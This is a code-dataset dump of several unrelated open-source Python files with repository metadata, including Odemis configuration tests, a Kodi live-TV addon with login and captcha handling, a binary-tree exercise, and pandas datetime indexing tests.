orbit["correctors"] = ['H3SFELC', 'H4SFELC', 'H10SMATCH', 'D11SMATCH', 'H12SMATCH']
setup = log.MachineSetup()
#setup.save_lattice(lat, "init.txt")
lat_all = MagneticLattice(lattice)
setup.load_lattice("init.txt", lat_all)
orbit["bpms"] = get_dict(lat, bpms)
seq_min_orb = [Action(func=opt.min_orbit, args=[orbit, 'simplex' ] )]
opt.eval(seq_bump)
apply_bump(cors, currents, dI, alpha=0.1)
"""
|
sserkez/ocelot
|
mint/flash_tune.py
|
Python
|
gpl-3.0
| 2,806 | 0.024947 |
# -*- coding: utf-8 -*-
"""
:created: 27 Aug 2014
:author: Éric Piel
:copyright: © 2014 Éric Piel, Delmic
This file is part of Odemis.
.. license::
Odemis is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License version 2 as published by the Free Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License along with Odemis. If not,
see http://www.gnu.org/licenses/.
"""
from __future__ import division
from past.builtins import basestring
import logging
import odemis.gui.conf.file as conffile
import odemis.gui as gui
from odemis.util import test
import os
import shutil
import unittest
from unittest.case import skip
logging.getLogger().setLevel(logging.DEBUG)
class ConfigTest(object):
""" Generic test setup/teardown methods for testing one configuration """
# .conf_class must be defined
def setUp(self):
# save the real user file to be able to do whatever we like
filename = os.path.join(conffile.CONF_PATH, self.conf_class.file_name)
backname = filename + u".testbak"
if os.path.exists(filename):
logging.info("Saving file %s", filename)
shutil.copy2(filename, backname)
self.backname = backname
else:
self.backname = None
self.filename = filename
def tearDown(self):
if self.backname:
logging.info("Restoring file %s", self.filename)
shutil.copy2(self.backname, self.filename)
else:
try:
os.remove(self.filename)
except OSError:
pass
else:
logging.info("Deleting test file %s", self.filename)
# Reset the module globals
gui.conf.CONF_GENERAL = None
gui.conf.CONF_ACQUI = None
gui.conf.CONF_CALIB = None
class GeneralConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.GeneralConfig
def test_simple(self):
conf = gui.conf.get_general_conf()
path = conf.get_manual()
if path is not None:
self.assertTrue(os.path.exists(path))
path = conf.get_manual("secom")
if path is not None:
self.assertTrue(os.path.exists(path))
path = conf.get_dev_manual()
if path is not None:
self.assertTrue(os.path.exists(path))
def test_save(self):
conf = gui.conf.get_general_conf()
conf.set("calibration", "ar_file", u"booo")
# reset
del conf
gui.conf.CONF_GENERAL = None
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"booo")
def test_save_unicode(self):
conf = gui.conf.get_general_conf()
conf.set("calibration", "ar_file", u"booµ")
# reset
del conf
gui.conf.CONF_GENERAL = None
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"booµ")
def test_default(self):
try:
os.remove(self.filename)
except OSError:
pass
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"")
path = conf.get("calibration", "spec_file")
self.assertEqual(path, u"")
path = conf.get_manual()
self.assertTrue(path.endswith(u".pdf"))
class AcquisitionConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.AcquisitionConfig
def test_simple(self):
conf = gui.conf.get_acqui_conf()
self.assertIsInstance(conf.last_path, basestring)
self.assertIsInstance(conf.last_format, basestring)
self.assertLess(len(conf.last_extension), 12)
def test_save(self):
# Will fail if setting the properties goes wrong
conf = gui.conf.get_acqui_conf()
conf.last_path = u"/home/booo/"
conf.last_format = "HDF5"
conf.last_extension = ".h5"
conf.fn_ptn = u"{timelng}-test {cnt}"
def test_save_unicode(self):
conf = gui.conf.get_acqui_conf()
conf.last_path = u"/home/boooµ/"
conf.last_format = "HDF5"
conf.last_extension = ".h5"
conf.fn_ptn = u"{timelng}-test {cnt} µm value"
class CalibrationConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.CalibrationConfig
def test_simple(self):
conf = gui.conf.get_calib_conf()
# non existing id should return None
calib = conf.get_sh_calib(0)
self.assertIs(calib, None)
def test_save(self):
conf = gui.conf.get_calib_conf()
shid = 125166841353
# try with a bit annoying numbers
htop = (-0.5, 1e-6)
hbot = (5e9, -1.55158e-6)
hfoc = 0.006
ofoc = -0.001e-6
strans = (5.468e-3, -365e-6)
sscale = (1.1, 0.9)
srot = 0.1
iscale = (13.1, 13.1)
irot = 5.9606
iscale_xy = (1.01, 0.9)
ishear = 1.1
resa = (8.09, 2.16)
resb = (-157.5, -202.9)
hfwa = (-0.953, -0.009)
scaleshift = (0.029, -2.90e-05)
orig_calib = (htop, hbot, hfoc, ofoc, strans, sscale, srot, iscale, irot,
iscale_xy, ishear, resa, resb, hfwa, scaleshift)
conf.set_sh_calib(shid, *orig_calib)
# read back from memory
back_calib = conf.get_sh_calib(shid)
for o, b in zip(orig_calib, back_calib):
if isinstance(o, tuple):
test.assert_tuple_almost_equal(o, b)
else:
self.assertAlmostEqual(o, b)
# read back from file
del conf
gui.conf.CONF_CALIB = None
conf = gui.conf.get_calib_conf()
back_calib = conf.get_sh_calib(shid)
for o, b in zip(orig_calib, back_calib):
if isinstance(o, tuple):
test.assert_tuple_almost_equal(o, b)
else:
self.assertAlmostEqual(o, b)
if __name__ == "__main__":
unittest.main()
|
delmic/odemis
|
src/odemis/gui/conf/test/conf_test.py
|
Python
|
gpl-2.0
| 6,386 | 0.001097 |
# -*- coding: utf-8 -*-
import xbmc, xbmcgui, xbmcplugin
import urllib2,urllib,cgi, re
import HTMLParser
import xbmcaddon
import json
import traceback
import os
import cookielib
from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
import datetime
import sys
import time
import CustomPlayer
import captcha
__addon__ = xbmcaddon.Addon()
__addonname__ = __addon__.getAddonInfo('name')
__icon__ = __addon__.getAddonInfo('icon')
addon_id = 'plugin.video.shahidmbcnet'
selfAddon = xbmcaddon.Addon(id=addon_id)
addonPath = xbmcaddon.Addon().getAddonInfo("path")
addonArt = os.path.join(addonPath,'resources/images')
communityStreamPath = os.path.join(addonPath,'resources/community')
COOKIEFILE = communityStreamPath+'/livePlayerLoginCookie.lwp'
profile_path = xbmc.translatePath(selfAddon.getAddonInfo('profile'))
def PlayStream(sourceEtree, urlSoup, name, url):
try:
playpath=urlSoup.chnumber.text
pDialog = xbmcgui.DialogProgress()
pDialog.create('XBMC', 'Communicating with Livetv')
pDialog.update(40, 'Attempting to Login')
if shouldforceLogin():
if performLogin():
print 'done login'
print 'ooops'
code=getcode();
print 'firstCode',code
if 1==2 and not code or code[0:1]=="w":
pDialog.update(40, 'Refreshing Login')
code=getcode(True);
print 'secondCode',code
liveLink= sourceEtree.findtext('rtmpstring')
pDialog.update(80, 'Login Completed, now playing')
print 'rtmpstring',liveLink
#liveLink=liveLink%(playpath,match)
liveLink=liveLink%(playpath,code)
name+='-LiveTV'
print 'liveLink',liveLink
listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=liveLink )
pDialog.close()
player = CustomPlayer.MyXBMCPlayer()
start = time.time()
#xbmc.Player().play( liveLink,listitem)
player.play( liveLink,listitem)
while player.is_active:
xbmc.sleep(200)
#return player.urlplayed
#done = time.time()
done = time.time()
elapsed = done - start
if player.urlplayed and elapsed>=3:
return True
else:
return False
except:
traceback.print_exc(file=sys.stdout)
return False
def getcode():
#url = urlSoup.url.text
cookieJar=getCookieJar()
link=getUrl('http://www.livetv.tn/index.php',cookieJar)
captcha=None
match =re.findall('<img src=\"(.*?)\" alt=\"CAPT', link)
if len(match)>0:
captcha="http://www.livetv.tn"+match[0]
else:
captcha=None
solution=None
if captcha:
local_captcha = os.path.join(profile_path, "captchaC.img" )
localFile = open(local_captcha, "wb")
localFile.write(getUrl(captcha,cookieJar))
localFile.close()
cap=parseCaptcha(local_captcha)
print 'parsed cap',cap
if cap=="" or not len(cap)==3:
solver = InputWindow(captcha=local_captcha)
solution = solver.get()
else:
solution=cap
if solution:
#do captcha post
post={'capcode':solution}
post = urllib.urlencode(post)
link=getUrl("http://www.livetv.tn/",cookieJar,post)
code =re.findall('code=(.*?)[\'\"]', link)[0]
return code
def parseCaptcha(filePath):
retVal=""
try:
print 'the val is'
retVal=captcha.getString(filePath)
print 'the val is',retVal
except: traceback.print_exc(file=sys.stdout)
return retVal
def getUrl(url, cookieJar=None,post=None):
cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
#opener = urllib2.install_opener(opener)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
response = opener.open(req,post)
link=response.read()
response.close()
return link;
def getCookieJar():
cookieJar=None
try:
cookieJar = cookielib.LWPCookieJar()
cookieJar.load(COOKIEFILE,ignore_discard=True)
except:
cookieJar=None
if not cookieJar:
cookieJar = cookielib.LWPCookieJar()
return cookieJar
def performLogin():
cookieJar=cookielib.LWPCookieJar()
html_text=getUrl("http://www.livetv.tn/login.php",cookieJar)
cookieJar.save (COOKIEFILE,ignore_discard=True)
print 'cookie jar saved',cookieJar
match =re.findall('<img src=\"(.*?)\" alt=\"Cap', html_text)
if len(match)>0:
captcha="http://www.livetv.tn/"+match[0]
else:
captcha=None
if captcha:
local_captcha = os.path.join(profile_path, "captcha.img" )
localFile = open(local_captcha, "wb")
localFile.write(getUrl(captcha,cookieJar))
localFile.close()
cap=parseCaptcha(local_captcha)
print 'login parsed cap',cap
if cap=="" or not len(cap)==4:
solver = InputWindow(captcha=local_captcha)
solution = solver.get()
else:
solution=cap
if solution or captcha==None:
print 'performing login'
userName=selfAddon.getSetting( "liveTvLogin" )
password=selfAddon.getSetting( "liveTvPassword")
if captcha:
post={'pseudo':userName,'epass':password,'capcode':solution}
else:
post={'pseudo':userName,'epass':password}
post = urllib.urlencode(post)
getUrl("http://www.livetv.tn/login.php",cookieJar,post)
return shouldforceLogin(cookieJar)==False
else:
return False
def shoudforceLogin2():
try:
# import dateime
lastUpdate=selfAddon.getSetting( "lastLivetvLogin" )
print 'lastUpdate',lastUpdate
do_login=False
now_datetime=datetime.datetime.now()
if lastUpdate==None or lastUpdate=="":
do_login=True
else:
print 'lastlogin',lastUpdate
try:
lastUpdate=datetime.datetime.strptime(lastUpdate,"%Y-%m-%d %H:%M:%S")
except TypeError:
lastUpdate = datetime.datetime.fromtimestamp(time.mktime(time.strptime(lastUpdate, "%Y-%m-%d %H:%M:%S")))
t=(now_datetime-lastUpdate).seconds/60
print 'lastUpdate',lastUpdate,now_datetime
print 't',t
if t>15:
do_login=True
print 'do_login',do_login
return do_login
except:
traceback.print_exc(file=sys.stdout)
return True
def shouldforceLogin(cookieJar=None):
try:
url="http://www.livetv.tn/index.php"
if not cookieJar:
cookieJar=getCookieJar()
html_txt=getUrl(url,cookieJar)
if '<a href="http://www.livetv.tn/login.php">' in html_txt:
return True
else:
return False
except:
traceback.print_exc(file=sys.stdout)
return True
class InputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
self.cptloc = kwargs.get('captcha')
self.img = xbmcgui.ControlImage(335,30,624,60,self.cptloc)
self.addControl(self.img)
self.kbd = xbmc.Keyboard()
def get(self):
self.show()
time.sleep(3)
self.kbd.doModal()
if (self.kbd.isConfirmed()):
text = self.kbd.getText()
self.close()
return text
self.close()
return False
|
marcuschia/ShaniXBMCWork
|
other/livetvPlayer.py
|
Python
|
gpl-2.0
| 7,065 | 0.045294 |
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: The root of binary tree.
@return: True if this Binary tree is Balanced, or false.
"""
def isBalanced(self, root):
# write your code here
isbalanced, h = self.isBalancedandHeight(root)
return isbalanced
def isBalancedandHeight(self, root):
if root is None:
return True, 0
l, r = root.left, root.right
l_balanced, l_h = self.isBalancedandHeight(l)
if not l_balanced:
return False, 0
r_balanced, r_h = self.isBalancedandHeight(r)
if not r_balanced:
return False, 0
if abs(l_h - r_h) < 2:
return True, max(l_h, r_h) + 1
return False, 0
|
Chasego/codirit
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BalancedBinaryTree_rec.py
|
Python
|
mit
| 873 | 0.001145 |
# This script will check http://services.scribus.net for broken assets
import lxml.html
url = "http://services.scribus.net"
doc = lxml.html.parse(url)
# pattern matching for relative urls: <a href="scribus_fonts.xml">
content_parsed = doc.xpath('href')
# also ignore scribusversions.xml
# Create a scraper class to feed .xml page results to
# Create a function that mails an admin when a result 404s
|
scribusproject/scribus-tools
|
resource-checker/scribus-services-check.py
|
Python
|
gpl-3.0
| 408 | 0.009804 |
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, Index, Series, Timestamp, date_range
import pandas._testing as tm
class TestDatetimeIndex:
def test_indexing_with_datetime_tz(self):
# GH#8260
# support datetime64 with tz
idx = Index(date_range("20130101", periods=3, tz="US/Eastern"), name="foo")
dr = date_range("20130110", periods=3)
df = DataFrame({"A": idx, "B": dr})
df["C"] = idx
df.iloc[1, 1] = pd.NaT
df.iloc[1, 2] = pd.NaT
# indexing
result = df.iloc[1]
expected = Series(
[Timestamp("2013-01-02 00:00:00-0500", tz="US/Eastern"), pd.NaT, pd.NaT],
index=list("ABC"),
dtype="object",
name=1,
)
tm.assert_series_equal(result, expected)
result = df.loc[1]
expected = Series(
[Timestamp("2013-01-02 00:00:00-0500", tz="US/Eastern"), pd.NaT, pd.NaT],
index=list("ABC"),
dtype="object",
name=1,
)
tm.assert_series_equal(result, expected)
# indexing - fast_xs
df = DataFrame({"a": date_range("2014-01-01", periods=10, tz="UTC")})
result = df.iloc[5]
expected = Series(
[Timestamp("2014-01-06 00:00:00+0000", tz="UTC")], index=["a"], name=5
)
tm.assert_series_equal(result, expected)
result = df.loc[5]
tm.assert_series_equal(result, expected)
# indexing - boolean
result = df[df.a > df.a[3]]
expected = df.iloc[4:]
tm.assert_frame_equal(result, expected)
# indexing - setting an element
df = DataFrame(
data=pd.to_datetime(["2015-03-30 20:12:32", "2015-03-12 00:11:11"]),
columns=["time"],
)
df["new_col"] = ["new", "old"]
df.time = df.set_index("time").index.tz_localize("UTC")
v = df[df.new_col == "new"].set_index("time").index.tz_convert("US/Pacific")
# trying to set a single element on a part of a different timezone
# this converts to object
df2 = df.copy()
df2.loc[df2.new_col == "new", "time"] = v
expected = Series([v[0], df.loc[1, "time"]], name="time")
tm.assert_series_equal(df2.time, expected)
v = df.loc[df.new_col == "new", "time"] + pd.Timedelta("1s")
df.loc[df.new_col == "new", "time"] = v
tm.assert_series_equal(df.loc[df.new_col == "new", "time"], v)
def test_consistency_with_tz_aware_scalar(self):
# xef gh-12938
# various ways of indexing the same tz-aware scalar
df = Series([Timestamp("2016-03-30 14:35:25", tz="Europe/Brussels")]).to_frame()
df = pd.concat([df, df]).reset_index(drop=True)
expected = Timestamp("2016-03-30 14:35:25+0200", tz="Europe/Brussels")
result = df[0][0]
assert result == expected
result = df.iloc[0, 0]
assert result == expected
result = df.loc[0, 0]
assert result == expected
result = df.iat[0, 0]
assert result == expected
result = df.at[0, 0]
assert result == expected
result = df[0].loc[0]
assert result == expected
result = df[0].at[0]
assert result == expected
def test_indexing_with_datetimeindex_tz(self):
# GH 12050
# indexing on a series with a datetimeindex with tz
index = date_range("2015-01-01", periods=2, tz="utc")
ser = Series(range(2), index=index, dtype="int64")
# list-like indexing
for sel in (index, list(index)):
# getitem
result = ser[sel]
expected = ser.copy()
if sel is not index:
expected.index = expected.index._with_freq(None)
tm.assert_series_equal(result, expected)
# setitem
result = ser.copy()
result[sel] = 1
expected = Series(1, index=index)
tm.assert_series_equal(result, expected)
# .loc getitem
result = ser.loc[sel]
expected = ser.copy()
if sel is not index:
expected.index = expected.index._with_freq(None)
tm.assert_series_equal(result, expected)
# .loc setitem
result = ser.copy()
result.loc[sel] = 1
expected = Series(1, index=index)
tm.assert_series_equal(result, expected)
# single element indexing
# getitem
assert ser[index[1]] == 1
# setitem
result = ser.copy()
result[index[1]] = 5
expected = Series([0, 5], index=index)
tm.assert_series_equal(result, expected)
# .loc getitem
assert ser.loc[index[1]] == 1
# .loc setitem
result = ser.copy()
result.loc[index[1]] = 5
expected = Series([0, 5], index=index)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("to_period", [True, False])
def test_loc_getitem_listlike_of_datetimelike_keys(self, to_period):
# GH 11497
idx = date_range("2011-01-01", "2011-01-02", freq="D", name="idx")
if to_period:
idx = idx.to_period("D")
ser = Series([0.1, 0.2], index=idx, name="s")
keys = [Timestamp("2011-01-01"), Timestamp("2011-01-02")]
if to_period:
keys = [x.to_period("D") for x in keys]
result = ser.loc[keys]
exp = Series([0.1, 0.2], index=idx, name="s")
if not to_period:
exp.index = exp.index._with_freq(None)
tm.assert_series_equal(result, exp, check_index_type=True)
keys = [
Timestamp("2011-01-02"),
Timestamp("2011-01-02"),
Timestamp("2011-01-01"),
]
if to_period:
keys = [x.to_period("D") for x in keys]
exp = Series(
[0.2, 0.2, 0.1], index=Index(keys, name="idx", dtype=idx.dtype), name="s"
)
result = ser.loc[keys]
tm.assert_series_equal(result, exp, check_index_type=True)
keys = [
Timestamp("2011-01-03"),
Timestamp("2011-01-02"),
Timestamp("2011-01-03"),
]
if to_period:
keys = [x.to_period("D") for x in keys]
with pytest.raises(KeyError, match="with any missing labels"):
ser.loc[keys]
def test_nanosecond_getitem_setitem_with_tz(self):
# GH 11679
data = ["2016-06-28 08:30:00.123456789"]
index = pd.DatetimeIndex(data, dtype="datetime64[ns, America/Chicago]")
df = DataFrame({"a": [10]}, index=index)
result = df.loc[df.index[0]]
expected = Series(10, index=["a"], name=df.index[0])
tm.assert_series_equal(result, expected)
result = df.copy()
result.loc[df.index[0], "a"] = -1
expected = DataFrame(-1, index=index, columns=["a"])
tm.assert_frame_equal(result, expected)
def test_loc_setitem_with_existing_dst(self):
# GH 18308
start = Timestamp("2017-10-29 00:00:00+0200", tz="Europe/Madrid")
end = Timestamp("2017-10-29 03:00:00+0100", tz="Europe/Madrid")
ts = Timestamp("2016-10-10 03:00:00", tz="Europe/Madrid")
idx = pd.date_range(start, end, closed="left", freq="H")
result = DataFrame(index=idx, columns=["value"])
result.loc[ts, "value"] = 12
expected = DataFrame(
[np.nan] * len(idx) + [12],
index=idx.append(pd.DatetimeIndex([ts])),
columns=["value"],
dtype=object,
)
tm.assert_frame_equal(result, expected)
|
jreback/pandas
|
pandas/tests/indexing/test_datetime.py
|
Python
|
bsd-3-clause
| 7,714 | 0.001037 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.